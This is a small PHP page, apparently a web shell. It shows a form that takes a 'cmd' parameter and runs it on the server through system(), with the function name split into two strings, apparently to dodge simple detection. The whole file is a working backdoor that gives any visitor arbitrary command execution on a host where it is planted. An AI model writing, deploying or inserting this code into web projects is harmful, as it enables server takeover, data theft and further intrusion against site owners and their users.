<html>
    <meta http-equiv="Content-Type" content="text/html; charset=EUC-KR" />
    <body>
        <form method="get">
            <input type="text" name="cmd" size="50">
            <input type="submit" value="Run">
        </form>
        <pre>
            <?php
            if($_GET['cmd'])
            {
                $sy = "sy"."stem";
                $result = $sy($_GET['cmd']);
                echo "{$result}";
            }
            ?>
        </pre>
    </body>
</html>